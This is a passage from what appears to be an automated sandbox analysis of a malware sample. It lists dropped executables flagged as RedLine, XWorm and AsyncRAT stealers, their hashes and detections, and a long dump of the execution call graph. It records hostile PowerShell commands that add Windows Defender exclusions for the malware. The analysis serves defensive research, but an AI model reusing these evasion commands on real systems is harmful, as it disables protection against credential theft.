                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
                                                                                Imagebase:0x7ff630ce0000
                                                                                File size:27'648 bytes
                                                                                MD5 hash:DEAD69D07BC33B762ABD466FB6F53E11
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
                                                                                Imagebase:0x900000
                                                                                File size:97'792 bytes
                                                                                MD5 hash:EAB323FA6C66098BE1068FEF0A03BFF2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: unknown
                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 96%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:15:06:59
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\YsrQekGS.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
                                                                                Imagebase:0x4b0000
                                                                                File size:42'496 bytes
                                                                                MD5 hash:6EA393666ED89F758B30EA5037F5C22A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2912640995.0000000002756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 92%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:6
                                                                                Start time:15:07:00
                                                                                Start date:16/07/2024
                                                                                Path:C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
                                                                                Imagebase:0x7ff625650000
                                                                                File size:4'099'584 bytes
                                                                                MD5 hash:94675EB54AC5DAA11ACE736DBFA9E7A2
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:10
                                                                                Start time:15:07:03
                                                                                Start date:16/07/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
Has exited:true

Target ID:11
Start time:15:07:03
Start date:16/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:15:07:10
Start date:16/07/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:15:07:10
Start date:16/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Execution Graph

Execution Coverage:12.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:4.2%
Total number of Nodes:2000
Total number of Limit Nodes:36
[execution_graph: serialized node and edge data of the interactive call graph (function addresses, resolved API names and call counts); not reproduced as text]
__close 22089->22090 22091 41e764 __getptd 67 API calls 22090->22091 22092 421c71 22091->22092 22093 421957 _LocaleUpdate::_LocaleUpdate 69 API calls 22092->22093 22094 421c7b 22093->22094 22120 4219fb 22094->22120 22097 421093 __malloc_crt 67 API calls 22099 421c9c 22097->22099 22098 421dbb __close 22098->21845 22099->22098 22127 421a77 22099->22127 22102 421dc8 22102->22098 22106 421ddb 22102->22106 22108 41a27a _realloc 67 API calls 22102->22108 22103 421ccc InterlockedDecrement 22104 421cdc 22103->22104 22105 421ced InterlockedIncrement 22103->22105 22104->22105 22110 41a27a _realloc 67 API calls 22104->22110 22105->22098 22107 421d03 22105->22107 22109 41eb5e __free_osfhnd 67 API calls 22106->22109 22107->22098 22112 41ed53 __lock 67 API calls 22107->22112 22108->22106 22109->22098 22111 421cec 22110->22111 22111->22105 22114 421d17 InterlockedDecrement 22112->22114 22115 421d93 22114->22115 22116 421da6 InterlockedIncrement 22114->22116 22115->22116 22118 41a27a _realloc 67 API calls 22115->22118 22137 421dbd 22116->22137 22119 421da5 22118->22119 22119->22116 22121 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22120->22121 22122 421a0f 22121->22122 22123 421a1a GetOEMCP 22122->22123 22124 421a38 22122->22124 22125 421a2a 22123->22125 22124->22125 22126 421a3d GetACP 22124->22126 22125->22097 22125->22098 22126->22125 22128 4219fb getSystemCP 79 API calls 22127->22128 22129 421a97 22128->22129 22130 421aa2 setSBCS 22129->22130 22133 421ae6 IsValidCodePage 22129->22133 22136 421b0b _memset __setmbcp_nolock 22129->22136 22131 41e48e __atodbl_l 5 API calls 22130->22131 22132 421c5a 22131->22132 22132->22102 22132->22103 22133->22130 22134 421af8 GetCPInfo 22133->22134 22134->22130 22134->22136 22140 4217c4 GetCPInfo 22136->22140 22273 41ec79 LeaveCriticalSection 22137->22273 22139 421dc4 22139->22098 22141 4218aa 22140->22141 22142 4217f8 _memset 22140->22142 22146 41e48e __atodbl_l 5 API calls 22141->22146 22150 42595c 22142->22150 22148 421955 22146->22148 
22148->22136 22149 4224fe ___crtLCMapStringA 102 API calls 22149->22141 22151 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22150->22151 22152 42596f 22151->22152 22160 4257a2 22152->22160 22155 4224fe 22156 41ce78 _LocaleUpdate::_LocaleUpdate 77 API calls 22155->22156 22157 422511 22156->22157 22226 422159 22157->22226 22161 4257c3 GetStringTypeW 22160->22161 22162 4257ee 22160->22162 22163 4257e3 GetLastError 22161->22163 22164 4257db 22161->22164 22162->22164 22165 4258d5 22162->22165 22163->22162 22166 425827 MultiByteToWideChar 22164->22166 22181 4258cf 22164->22181 22188 425ca0 GetLocaleInfoA 22165->22188 22172 425854 22166->22172 22166->22181 22168 41e48e __atodbl_l 5 API calls 22170 421865 22168->22170 22170->22155 22171 425926 GetStringTypeA 22177 425941 22171->22177 22171->22181 22173 425869 _memset __crtGetStringTypeA_stat 22172->22173 22174 41ccee _malloc 67 API calls 22172->22174 22176 4258a2 MultiByteToWideChar 22173->22176 22173->22181 22174->22173 22179 4258b8 GetStringTypeW 22176->22179 22180 4258c9 22176->22180 22178 41a27a _realloc 67 API calls 22177->22178 22178->22181 22179->22180 22184 422139 22180->22184 22181->22168 22185 422145 22184->22185 22187 422156 22184->22187 22186 41a27a _realloc 67 API calls 22185->22186 22185->22187 22186->22187 22187->22181 22189 425cd3 22188->22189 22190 425cce 22188->22190 22219 426cd9 22189->22219 22192 41e48e __atodbl_l 5 API calls 22190->22192 22193 4258f9 22192->22193 22193->22171 22193->22181 22194 425ce9 22193->22194 22195 425d29 GetCPInfo 22194->22195 22199 425db3 22194->22199 22196 425d40 22195->22196 22197 425d9e MultiByteToWideChar 22195->22197 22196->22197 22200 425d46 GetCPInfo 22196->22200 22197->22199 22203 425d59 _strlen 22197->22203 22198 41e48e __atodbl_l 5 API calls 22201 42591a 22198->22201 22199->22198 22200->22197 22202 425d53 22200->22202 22201->22171 22201->22181 22202->22197 22202->22203 22204 41ccee _malloc 67 API calls 22203->22204 22208 425d8b _memset __crtGetStringTypeA_stat 
22203->22208 22204->22208 22205 425de8 MultiByteToWideChar 22206 425e00 22205->22206 22207 425e1f 22205->22207 22210 425e07 WideCharToMultiByte 22206->22210 22211 425e24 22206->22211 22209 422139 __freea 67 API calls 22207->22209 22208->22199 22208->22205 22209->22199 22210->22207 22212 425e43 22211->22212 22213 425e2f WideCharToMultiByte 22211->22213 22214 4210d8 __calloc_crt 67 API calls 22212->22214 22213->22207 22213->22212 22215 425e4b 22214->22215 22215->22207 22216 425e54 WideCharToMultiByte 22215->22216 22216->22207 22217 425e66 22216->22217 22218 41a27a _realloc 67 API calls 22217->22218 22218->22207 22222 426cae 22219->22222 22223 426cc7 22222->22223 22224 426a7f strtoxl 91 API calls 22223->22224 22225 426cd4 22224->22225 22225->22190 22227 42217a LCMapStringW 22226->22227 22230 422195 22226->22230 22228 42219d GetLastError 22227->22228 22227->22230 22228->22230 22229 422393 22233 425ca0 ___ansicp 91 API calls 22229->22233 22230->22229 22231 4221ef 22230->22231 22232 422208 MultiByteToWideChar 22231->22232 22249 42238a 22231->22249 22242 422235 22232->22242 22232->22249 22234 4223bb 22233->22234 22237 4223d4 22234->22237 22238 4224af LCMapStringA 22234->22238 22234->22249 22235 41e48e __atodbl_l 5 API calls 22236 421885 22235->22236 22236->22149 22240 425ce9 ___convertcp 74 API calls 22237->22240 22239 42240b 22238->22239 22243 4224d6 22239->22243 22248 41a27a _realloc 67 API calls 22239->22248 22245 4223e6 22240->22245 22241 422286 MultiByteToWideChar 22246 422381 22241->22246 22247 42229f LCMapStringW 22241->22247 22244 41ccee _malloc 67 API calls 22242->22244 22253 42224e __crtGetStringTypeA_stat 22242->22253 22243->22249 22255 41a27a _realloc 67 API calls 22243->22255 22244->22253 22245->22249 22250 4223f0 LCMapStringA 22245->22250 22251 422139 __freea 67 API calls 22246->22251 22247->22246 22252 4222c0 22247->22252 22248->22243 22249->22235 22250->22239 22258 422412 22250->22258 22251->22249 22254 4222c9 22252->22254 22257 4222f2 22252->22257 
22253->22241 22253->22249 22254->22246 22256 4222db LCMapStringW 22254->22256 22255->22249 22256->22246 22263 42230d __crtGetStringTypeA_stat 22257->22263 22265 41ccee _malloc 67 API calls 22257->22265 22260 41ccee _malloc 67 API calls 22258->22260 22264 422423 _memset __crtGetStringTypeA_stat 22258->22264 22259 422341 LCMapStringW 22261 42237b 22259->22261 22262 422359 WideCharToMultiByte 22259->22262 22260->22264 22266 422139 __freea 67 API calls 22261->22266 22262->22261 22263->22246 22263->22259 22264->22239 22267 422461 LCMapStringA 22264->22267 22265->22263 22266->22246 22269 422481 22267->22269 22270 42247d 22267->22270 22271 425ce9 ___convertcp 74 API calls 22269->22271 22272 422139 __freea 67 API calls 22270->22272 22271->22270 22272->22239 22273->22139 22275 42318f 22274->22275 22276 41e49d __encode_pointer 6 API calls 22275->22276 22277 4231a7 22275->22277 22276->22275 22277->21680 22279 410bf7 GetProcAddress 22278->22279 22280 40fd0b OleInitialize 22278->22280 22279->22280 22281 410c07 22279->22281 22282 411cc7 GetCPInfo 22280->22282 22281->22280 22283 411ceb IsDBCSLeadByte 22282->22283 22283->22283 22284 411d03 22283->22284 22284->21693 22285->21700 22308 40bae4 22286->22308 22288 40c266 22331 40bfa8 GetModuleHandleW FindResourceW 22288->22331 22290 40c26d 22290->21709 22292 419e42 22291->22292 22293 419e3f FreeLibrary 22291->22293 22294 419e49 FreeLibrary 22292->22294 22295 419e4c OleUninitialize 22292->22295 22293->22292 22294->22295 22303 40d51f 22297->22303 22298 40d62a 22298->21701 22298->21702 22299 40d554 CharUpperW 22299->22303 22300 40d5db CharUpperW 22300->22303 22301 40d57b CharUpperW 22301->22303 22302 40cee5 124 API calls 22302->22303 22303->22298 22303->22299 22303->22300 22303->22301 22303->22302 22306 40d4d6 22304->22306 22305 40d4f5 22305->21707 22306->22305 22307 40d4ed SetEnvironmentVariableW 22306->22307 22307->22305 22309 40baee __EH_prolog _wcschr __write_nolock 22308->22309 22310 40bb11 GetModuleFileNameW 22309->22310 22312 
40bb3a _wcscpy 22309->22312 22311 40bb2d _wcsrchr 22310->22311 22311->22312 22330 40bb6e ctype 22311->22330 22313 4086e3 6 API calls 22312->22313 22324 40bb6a ctype _strncmp 22313->22324 22314 40bca4 22314->22330 22335 408f0d 22314->22335 22315 408ace 122 API calls 22315->22324 22318 41ccee _malloc 67 API calls 22320 40bcca 22318->22320 22319 408d9b 125 API calls 22319->22324 22321 408d9b 125 API calls 22320->22321 22320->22330 22323 40bce6 22321->22323 22322 408f0d 124 API calls 22322->22324 22325 41ccee _malloc 67 API calls 22323->22325 22323->22330 22324->22314 22324->22315 22324->22319 22324->22322 22324->22330 22326 40bd00 22325->22326 22327 4118ad MultiByteToWideChar 22326->22327 22326->22330 22328 40bd21 22327->22328 22329 41a27a _realloc 67 API calls 22328->22329 22329->22330 22330->22288 22332 40bfd6 22331->22332 22334 40bfd0 22331->22334 22333 40bdcf ctype 102 API calls 22332->22333 22333->22334 22334->22290 22336 408e6b 124 API calls 22335->22336 22337 408f21 22336->22337 22338 408f38 22337->22338 22339 40638c 120 API calls 22337->22339 22338->22318 22339->22338 23647 41e77e 23649 41e78a __close 23647->23649 23648 41e7a2 23652 41e7b0 23648->23652 23654 41a27a _realloc 67 API calls 23648->23654 23649->23648 23650 41e88c __close 23649->23650 23651 41a27a _realloc 67 API calls 23649->23651 23651->23648 23653 41e7be 23652->23653 23655 41a27a _realloc 67 API calls 23652->23655 23656 41a27a _realloc 67 API calls 23653->23656 23657 41e7cc 23653->23657 23654->23652 23655->23653 23656->23657 23658 41e7da 23657->23658 23659 41a27a _realloc 67 API calls 23657->23659 23660 41e7e8 23658->23660 23662 41a27a _realloc 67 API calls 23658->23662 23659->23658 23661 41e7f6 23660->23661 23663 41a27a _realloc 67 API calls 23660->23663 23664 41e807 23661->23664 23665 41a27a _realloc 67 API calls 23661->23665 23662->23660 23663->23661 23666 41ed53 __lock 67 API calls 23664->23666 23665->23664 23667 41e80f 23666->23667 23668 41e834 23667->23668 23669 41e81b InterlockedDecrement 
23667->23669 23683 41e898 23668->23683 23669->23668 23671 41e826 23669->23671 23671->23668 23674 41a27a _realloc 67 API calls 23671->23674 23673 41ed53 __lock 67 API calls 23675 41e848 23673->23675 23674->23668 23676 41e879 23675->23676 23677 421fec ___removelocaleref 8 API calls 23675->23677 23686 41e8a4 23676->23686 23681 41e85d 23677->23681 23680 41a27a _realloc 67 API calls 23680->23650 23681->23676 23682 421e14 ___freetlocinfo 67 API calls 23681->23682 23682->23676 23689 41ec79 LeaveCriticalSection 23683->23689 23685 41e841 23685->23673 23690 41ec79 LeaveCriticalSection 23686->23690 23688 41e886 23688->23680 23689->23685 23690->23688 24027 41c58b 24030 41c57b 24027->24030 24029 41c598 ctype 24033 420c83 24030->24033 24032 41c589 24032->24029 24034 420c8f __close 24033->24034 24035 41ed53 __lock 67 API calls 24034->24035 24039 420c96 24035->24039 24036 420ccf 24043 420cea 24036->24043 24038 420ce0 __close 24038->24032 24039->24036 24040 420cc6 24039->24040 24042 41a27a _realloc 67 API calls 24039->24042 24041 41a27a _realloc 67 API calls 24040->24041 24041->24036 24042->24040 24046 41ec79 LeaveCriticalSection 24043->24046 24045 420cf1 24045->24038 24046->24045 22675 40dcaf 22676 40dcbc __write_nolock 22675->22676 22677 40c271 ctype 104 API calls 22676->22677 22678 40dcd0 22677->22678 22679 401b74 _swprintf 101 API calls 22678->22679 22680 40dce2 SetDlgItemTextW 22679->22680 22683 40cfc8 PeekMessageW 22680->22683 22684 40cfe3 GetMessageW TranslateMessage DispatchMessageW 22683->22684 22685 40d004 22683->22685 22684->22685 19289 40f436 19290 40f440 __EH_prolog __write_nolock 19289->19290 19450 4060e6 19290->19450 19293 40f482 19295 40f46b 19293->19295 19298 40f4f1 GetDlgItemTextW 19293->19298 19299 40f48c 19293->19299 19294 40fa19 19296 40fa3d 19294->19296 19297 40fa2e SendMessageW 19294->19297 19300 40fa56 19296->19300 19301 40fa46 SendDlgItemMessageW 19296->19301 19297->19296 19303 40f525 19298->19303 19304 40f4cd 19298->19304 19299->19304 19305 40f48f 
19299->19305 19529 40da71 19300->19529 19301->19300 19307 40f53c GetDlgItem 19303->19307 19448 40f52d 19303->19448 19304->19295 19309 40f8c8 EndDialog 19304->19309 19305->19295 19312 40c271 ctype 104 API calls 19305->19312 19310 40f550 SendMessageW SendMessageW 19307->19310 19311 40f576 SetFocus 19307->19311 19309->19295 19310->19311 19315 40f587 19311->19315 19328 40f593 19311->19328 19316 40f4a9 19312->19316 19313 40fbb2 KiUserCallbackDispatcher 19313->19295 19314 40fa8d GetDlgItem 19320 40faa3 19314->19320 19321 40faa9 SetWindowTextW 19314->19321 19317 40c271 ctype 104 API calls 19315->19317 19571 4050e0 SHGetMalloc 19316->19571 19322 40f591 19317->19322 19319 40f9bc 19324 40c271 ctype 104 API calls 19319->19324 19320->19321 19549 419a27 GetClassNameW 19321->19549 19456 40d148 GetDlgItem 19322->19456 19327 40f9cd SetDlgItemTextW 19324->19327 19326 40f4b8 SetDlgItemTextW 19326->19295 19330 40f9e0 19327->19330 19333 40c271 ctype 104 API calls 19328->19333 19336 40c271 ctype 104 API calls 19330->19336 19337 40f5c5 19333->19337 19335 40f5e7 19339 40f5fb 19335->19339 19575 40d93c 19335->19575 19341 40fa05 19336->19341 19342 401b74 _swprintf 101 API calls 19337->19342 19338 40faec 19347 40c271 ctype 104 API calls 19338->19347 19350 40fb20 19338->19350 19465 40927f 19339->19465 19346 40c271 ctype 104 API calls 19341->19346 19342->19322 19343 40e700 154 API calls 19343->19338 19351 40fa0c MessageBoxW 19346->19351 19348 40fafe SetDlgItemTextW 19347->19348 19352 40c271 ctype 104 API calls 19348->19352 19349 40f60f GetLastError 19353 40f61a 19349->19353 19354 40e700 154 API calls 19350->19354 19396 40fbcc _wcscat 19350->19396 19351->19295 19357 40fb12 SetDlgItemTextW 19352->19357 19471 4199fd SetCurrentDirectoryW 19353->19471 19358 40fb3c 19354->19358 19356 40fc75 19360 40fc88 19356->19360 19361 40fc7e EnableWindow 19356->19361 19357->19350 19362 40fb70 19358->19362 19367 40fb4d 19358->19367 19359 40f62f 19363 40f641 19359->19363 19364 40f636 GetLastError 19359->19364 
19365 40fca2 19360->19365 19603 4060a3 GetDlgItem KiUserCallbackDispatcher 19360->19603 19361->19360 19369 40fb78 SetForegroundWindow 19362->19369 19370 40fbbf 19362->19370 19374 40f6be 19363->19374 19376 40f652 GetTickCount 19363->19376 19421 40f6a2 ctype 19363->19421 19364->19363 19366 40fccd 19365->19366 19379 40fcc7 PostMessageW 19365->19379 19380 40fcbf SendMessageW 19365->19380 19366->19295 19381 40c271 ctype 104 API calls 19366->19381 19588 419812 ShowWindow 19367->19588 19369->19370 19371 40fb87 19369->19371 19372 40e700 154 API calls 19370->19372 19371->19370 19378 40fb8f DialogBoxParamW 19371->19378 19372->19396 19373 40f8d7 19483 4060c1 GetDlgItem ShowWindow 19373->19483 19384 40f6d9 GetModuleFileNameW 19374->19384 19385 40f86f 19374->19385 19472 401b74 19376->19472 19377 40fc99 19604 4060a3 GetDlgItem KiUserCallbackDispatcher 19377->19604 19378->19370 19392 40fbab 19378->19392 19379->19366 19380->19366 19393 40fcdf SetDlgItemTextW 19381->19393 19581 40ceac 19384->19581 19394 40c271 ctype 104 API calls 19385->19394 19388 40fc55 19397 419812 89 API calls 19388->19397 19389 40f8e9 19484 4060c1 GetDlgItem ShowWindow 19389->19484 19390 41a27a _realloc 67 API calls 19400 40fb6f 19390->19400 19391 40f66b 19475 408843 19391->19475 19392->19313 19393->19295 19399 40f879 19394->19399 19396->19356 19396->19388 19402 40c271 ctype 104 API calls 19396->19402 19403 40fc72 19397->19403 19405 401b74 _swprintf 101 API calls 19399->19405 19400->19362 19402->19396 19403->19356 19404 40f8f2 19485 4060a3 GetDlgItem KiUserCallbackDispatcher 19404->19485 19410 40f897 19405->19410 19406 401b74 _swprintf 101 API calls 19407 40f72b CreateFileMappingW 19406->19407 19411 40f78a GetCommandLineW 19407->19411 19412 40f7ee ShellExecuteExW 19407->19412 19418 40c271 ctype 104 API calls 19410->19418 19415 40f79a 19411->19415 19427 40f80b ctype 19412->19427 19413 40f8fa 19486 4060c1 GetDlgItem ShowWindow 19413->19486 19414 40f690 19416 40f697 GetLastError 19414->19416 19414->19421 19585 
40d0c2 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListW 19415->19585 19416->19421 19422 40f8b2 MessageBoxW 19418->19422 19420 40f903 SetDlgItemTextW GetDlgItem 19424 40f921 GetWindowLongW SetWindowLongW 19420->19424 19425 40f93b 19420->19425 19421->19373 19421->19374 19422->19304 19424->19425 19487 40e700 19425->19487 19426 40d0c2 3 API calls 19432 40f7c2 19426->19432 19429 40f820 WaitForInputIdle 19427->19429 19430 40f845 19427->19430 19434 40f830 19429->19434 19438 40f858 UnmapViewOfFile CloseHandle 19430->19438 19439 40f86a 19430->19439 19433 40d0c2 3 API calls 19432->19433 19440 40f7ce MapViewOfFile 19433->19440 19434->19430 19436 40f837 Sleep 19434->19436 19435 40e700 154 API calls 19437 40f957 19435->19437 19436->19430 19436->19434 19517 40e187 19437->19517 19438->19439 19439->19304 19439->19385 19441 40f7eb _realloc 19440->19441 19441->19412 19444 40e700 154 API calls 19447 40f970 19444->19447 19445 40f996 19587 4060a3 GetDlgItem KiUserCallbackDispatcher 19445->19587 19447->19445 19449 40e700 154 API calls 19447->19449 19448->19313 19448->19319 19449->19445 19451 406113 19450->19451 19452 4060ef 19450->19452 19625 40babd 19451->19625 19454 406111 19452->19454 19605 40c00e 19452->19605 19454->19293 19454->19294 19454->19295 19457 40d178 19456->19457 19458 40d1aa SendMessageW SendMessageW 19456->19458 19641 418f00 19457->19641 19459 40d1fa SendMessageW SendMessageW SendMessageW 19458->19459 19460 40d1de 19458->19460 19462 40d244 SendMessageW 19459->19462 19463 40d226 SendMessageW 19459->19463 19460->19459 19462->19335 19463->19462 19467 40928c __write_nolock _wcsncpy 19465->19467 19466 40931b 19468 4091e9 9 API calls 19466->19468 19470 40933e 19466->19470 19467->19466 19467->19470 19644 4091e9 19467->19644 19468->19470 19470->19349 19470->19353 19471->19359 19473 41a767 __vswprintf_c_l 101 API calls 19472->19473 19474 401b8c 19473->19474 19474->19391 19476 408850 __write_nolock 19475->19476 19477 4088b1 19476->19477 19478 4088b7 CreateFileW 
19476->19478 19479 4088ff 19477->19479 19480 40a77b 2 API calls 19477->19480 19478->19477 19479->19414 19481 4088e4 19480->19481 19481->19479 19482 4088e8 CreateFileW 19481->19482 19482->19479 19483->19389 19484->19404 19485->19413 19486->19420 19488 40e70a __EH_prolog __write_nolock 19487->19488 19489 40f2da 19488->19489 19698 40d631 19488->19698 19489->19435 19492 40d631 ExpandEnvironmentStringsW 19503 40e73f _wcscat _wcslen _wcsrchr _wcscpy 19492->19503 19493 40ea5b SetWindowTextW 19493->19503 19496 40eaf9 RegOpenKeyExW 19498 40eb15 RegQueryValueExW RegCloseKey 19496->19498 19496->19503 19497 41a308 _realloc 72 API calls 19497->19503 19498->19503 19500 41a27a _realloc 67 API calls 19500->19503 19501 40e847 SetFileAttributesW 19504 40e905 GetFileAttributesW 19501->19504 19510 40e842 _memset _wcslen 19501->19510 19503->19489 19503->19492 19503->19493 19503->19496 19503->19497 19503->19500 19503->19510 19514 40ec50 SendMessageW 19503->19514 19702 411bd1 CompareStringW 19503->19702 19703 40d9c6 19503->19703 19710 419a10 GetCurrentDirectoryW 19503->19710 19711 40952e 19503->19711 19720 409369 19503->19720 19723 40d7dd 19503->19723 19506 40e913 DeleteFileW 19504->19506 19504->19510 19506->19510 19508 40952e 7 API calls 19508->19510 19510->19501 19510->19503 19510->19508 19511 401b74 _swprintf 101 API calls 19510->19511 19516 40e8e1 SHFileOperationW 19510->19516 19715 40a6ec 19510->19715 19512 40e945 GetFileAttributesW 19511->19512 19512->19510 19513 40e956 MoveFileW 19512->19513 19513->19510 19515 40e96e MoveFileExW 19513->19515 19514->19503 19515->19510 19516->19504 19518 40e191 _wcscpy __EH_prolog __write_nolock 19517->19518 19746 410ac0 19518->19746 19520 40e1c2 _wcscpy 19750 405379 19520->19750 19522 40e1e0 19754 407096 19522->19754 19526 40e22c 19769 406fba 19526->19769 19530 40da7e __write_nolock 19529->19530 21371 419bcb 19530->21371 19533 40db61 GetDlgItem SendMessageW 19548 419a10 GetCurrentDirectoryW 19533->19548 19534 40da8b GetWindow 19534->19533 19535 
